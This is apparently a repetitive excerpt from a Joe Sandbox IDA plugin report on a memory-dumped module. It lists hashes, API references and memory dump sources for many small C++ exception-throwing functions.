Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: e6d478802f4e2c29174cc2dad23998b984925515eb577c5af20ab09654826a96
Instruction ID: f18b78359c21acb8b37ff29656e3810f10cbd559dcb1938146833e853c9888b1
Opcode Fuzzy Hash: e6d478802f4e2c29174cc2dad23998b984925515eb577c5af20ab09654826a96
Instruction Fuzzy Hash: D2F04FB29106089FC704DF99D5419DABBF8AF05354B24C26EE94DA7B61EB30F904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE36A68

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE36A7D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE36A76

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: ddaacc57a9a07b49fa918273233a3ca0f1e80fd9739dce53d9ee8825ea64f9b3
Instruction ID: 6301973fb63a0efe0b220fd5181ed693c779d8284b3c8c90a334647589c5e836
Opcode Fuzzy Hash: ddaacc57a9a07b49fa918273233a3ca0f1e80fd9739dce53d9ee8825ea64f9b3
Instruction Fuzzy Hash: 32F04F729102089FC704DF59D5419DABBF8AF04354B24C26ED81D97B60EB30FA04CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE344A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE344C8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE344DD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE344D6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: b1c4680721c9434e70efb8d05e800608038fa624c6265775cdd938b4ba4b5aa1
Instruction ID: b02e153c2b2715c173a1594a6d3a0770d26fdd751fe96e73ed525e5531e6a99e
Opcode Fuzzy Hash: b1c4680721c9434e70efb8d05e800608038fa624c6265775cdd938b4ba4b5aa1
Instruction Fuzzy Hash: 88F062B69102089FC704DF59D8419DABBF8AF44354F24C16ED90D97B60EB30F944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34428

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3443D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34436

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 7602bf8d10a0c6340bf43e26e11a25bcefb39f71026882f94de10793066f5eae
Instruction ID: 72dd63d2c11648250bbc439545a9b9b281a1427e8604729a0f2199e9f44f22db
Opcode Fuzzy Hash: 7602bf8d10a0c6340bf43e26e11a25bcefb39f71026882f94de10793066f5eae
Instruction Fuzzy Hash: 4DF062729142089FC704DF59D8419DABBF8AF05354B24C16ED80D9BB60EB30F904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34568

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3457D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34576

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 14d6e14fc4bc17a4c3615137e7d05996389728b8cc13a8288e27b13f4aceb2f5
Instruction ID: 29504047e1705f21f8242b4f3fecb474fe59a22174da6157e85622930c9b17a4
Opcode Fuzzy Hash: 14d6e14fc4bc17a4c3615137e7d05996389728b8cc13a8288e27b13f4aceb2f5
Instruction Fuzzy Hash: FCF06872D102046FC704DF59D4419DABBF8AF05314B14C16ED80D57760EB30FA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34780 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE347A8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE347BD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE347B6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 39fb208f845b233e08446dad01c1967db8c4739dcf0318b85465fa8b4360dd1e
Instruction ID: 7722554769a8a6fb8b6a784d2ab5fe733007c40da11cac554be60bf47b452746
Opcode Fuzzy Hash: 39fb208f845b233e08446dad01c1967db8c4739dcf0318b85465fa8b4360dd1e
Instruction Fuzzy Hash: 6CF03C729102089FD704DF59D84199ABBF8AF15714B24C26AD84D97B60EB70E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54340 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE54368

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE5437D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE54376

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 2a8129887b48340a38436324e4cc2f0f5a6244b4dace76004f174b45a4e15345
Instruction ID: d1f0a3f6f2b01ea093dc814e318aff8ae214862f8b88e82ef1c36725ded9d53b
Opcode Fuzzy Hash: 2a8129887b48340a38436324e4cc2f0f5a6244b4dace76004f174b45a4e15345
Instruction Fuzzy Hash: 16F062729112089FC704DF99D8419DAB7F8EF05314B24C26ED80997B60EB30EA14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45B20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45B49

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE45B5E

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE45B57

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: ed79853755c9cf610c18ef3deee60be011c874fb64dd7497ca1e03cc77d9880e
Instruction ID: 739315015c1e1c9bd292a7d748400b369f1db91d5c65e86e36d8ebf66dd9fe25
Opcode Fuzzy Hash: ed79853755c9cf610c18ef3deee60be011c874fb64dd7497ca1e03cc77d9880e
Instruction Fuzzy Hash: A0F0B473D002086AD700DB99E8429DA7BB8AB51344F14817AED09A7690EB70A708C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE53050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE53078

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE5308D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE53086

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: f478aae71635c64fa97c836460f7fe0210c4ce4defcfd036b6b836773555cb94
Instruction ID: 4aef48405d01573d11de17d2e2ac4f223c36e1b9f4e9672487ccb89d70d6d3d3
Opcode Fuzzy Hash: f478aae71635c64fa97c836460f7fe0210c4ce4defcfd036b6b836773555cb94
Instruction Fuzzy Hash: CBF062729107089FC704DF99D4419DAB7F8AF04314B24C16ED80D97B60EB70E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34CD8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE34CED

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34CE6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 2a0bd105608d3d617aa08850b331b7e005f03540445240bd0c414a3d6e704d66
Instruction ID: 55ff82a178d59b8430dd68610381c482d20c5ddd5686bea5606a613f18b59645
Opcode Fuzzy Hash: 2a0bd105608d3d617aa08850b331b7e005f03540445240bd0c414a3d6e704d66
Instruction Fuzzy Hash: 3BF09072800208AFD304DF99D9429DA7BF8AF04304F20C26ED80D97B60EB31FA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE368B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE368D8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE368ED

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE368E6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 5214c4648e2d4199f98268846dfeea0522114beda3c80db31e729faf6a8e39db
Instruction ID: d755cd4dcaac221eed2eec7163f9711224bb84ca14a3e2b530f95a0f18bbeb24
Opcode Fuzzy Hash: 5214c4648e2d4199f98268846dfeea0522114beda3c80db31e729faf6a8e39db
Instruction Fuzzy Hash: 0AF096729002045FD304DF99D5419DA77F8AF04344B10C16ED80D9BB50EB30F504CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE34980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE349A8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE349BD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE349B6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 4dacfa1f1b5346894006fef4a46e89508419586c753b5b26c673a0249daa7842
Instruction ID: 9545fc2acbc6eaf0b7c94e98b05ee0205d62fc9b233a01fe13c20c715efafeca
Opcode Fuzzy Hash: 4dacfa1f1b5346894006fef4a46e89508419586c753b5b26c673a0249daa7842
Instruction Fuzzy Hash: 2BF062729002085BD304DF95D4419DA7BF89F05304B10C26AD8095B760EB30A904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE345E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34608

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3461D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE34616

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 2cb8402b6379538753206543a6ae9a7122ed39cba3f09dd98b738c6f43a471f9
Instruction ID: 477c37c796ecd4a253f2b3df1e10d3dd29c6abf3772860ce165c9beae19974af
Opcode Fuzzy Hash: 2cb8402b6379538753206543a6ae9a7122ed39cba3f09dd98b738c6f43a471f9
Instruction Fuzzy Hash: DBF036729142086FD704DF55D9419DA7BF89F15344F14C1AED90D57750EB30F504CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE346F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE34718

